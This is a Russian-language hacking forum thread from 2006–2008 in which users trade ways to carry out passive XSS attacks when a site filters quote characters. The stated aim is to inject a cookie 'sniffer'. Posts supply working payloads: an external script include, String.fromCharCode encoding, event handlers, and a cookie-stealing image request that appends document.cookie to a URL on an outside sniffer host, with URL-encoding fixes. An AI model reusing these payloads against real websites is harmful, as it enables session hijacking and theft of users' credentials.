PDA

Просмотр полной версии : Как можно произвести xss, если фильтруются кавычки?

1ten0.0net1
20.04.2006, 05:00
Скажите - как можно произвести xss, если фильтруются кавычки? Вариант с заменой на одинарные, %22 и на &/#22; , а также перенаправление на мой java-скрипт не предлагать. На серваке magic_quotes=on.
drmist
20.04.2006, 10:42
Одинарный ковычки тоже фильтруютя?
Azazel
20.04.2006, 11:01
Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>

А во вторых попробуй использовать String.fromCharCode
(encoder http://www.paulschou.com/tools/xlate/)
K[o]S
20.04.2006, 11:14
Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>

А во вторых попробуй использовать String.fromCharCode
(encoder http://www.paulschou.com/tools/xlate/)
Ковычки могут понадобиться для того чтоб закрыть тег =)

Автор поясни какого типа XSS актив пасив мыло форум и т.д
1ten0.0net1
20.04.2006, 15:18
Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>


Вариант со внедрением ява-скрипта не подходит, как я и написал выше.
Инъекция пассивная, одинарные фильтруются. Нужно внедрить адрес снифера. То, что знаю я - осуществляется через кавычки, поэтому прошу совета.
Xex
21.04.2006, 01:46
а просто тыги можешь использовать?...
ну например картинку вставить?...
<img src="тут твой код или адрес снифера">
а далее можешь проверить:
<script>alert(document.images[0].src)</script>
Как дальше использовать думаю разберешься...
Laggi
21.04.2006, 23:35
Гм, аналогичная ситуация - пассивный Xss, фильтруется только ", '... Что можно сделать нехорошего без кавычек? :-)
Т.е. просто картинку вставить могу - там кавычки не нужны, а вот с запросом О_о...
Laggi
21.04.2006, 23:46
r=<img%20src=http://antichat.ru/cgi-bin/s.jpg?><script>img%20=%20new%20Image();%20img.src%20=%20document. images[19].src+document.cookie;</script>
К примеру не подходит
Laggi
21.04.2006, 23:49
А, все, доперло - "+" = " "... как от этого избавиться? :-) & нельзя использовать, сразу говорю.

В виде "%ХХ" как "+" выглядит?

UPD: усе, спасибо, нашел :-) %2B - все работает
Del
24.05.2006, 13:23
так как запрос без кавычек выглядит?
PaLb14
06.08.2008, 19:35
Дак как все таки обойти, если мне нужно закрыть тэг а кавычку съедает?
Bonnie and Clyde
06.08.2008, 19:43
вообщето тег закрывается без кавычки т.е. <тег>бла-бла</тег> возможно при ксс использовать OnMouseOver=xxx; BodyOnLoad=; etc...... учи html и JavaScript
PaLb14
06.08.2008, 19:50
Есть сайт в поиск ввожу <script>alert()</script> он все ставит в кавычки
"<script>alert()</script>" меняю запрос на "><script>alert()</script> кавычка фильтруется на "&quot;"
Don1=2
06.08.2008, 20:42
тогда с чего ты решил что там вообще есть ксс?
PaLb14
06.08.2008, 21:17
Дак вот я и спрашиваю может есть какой то обход этой фильтрации!?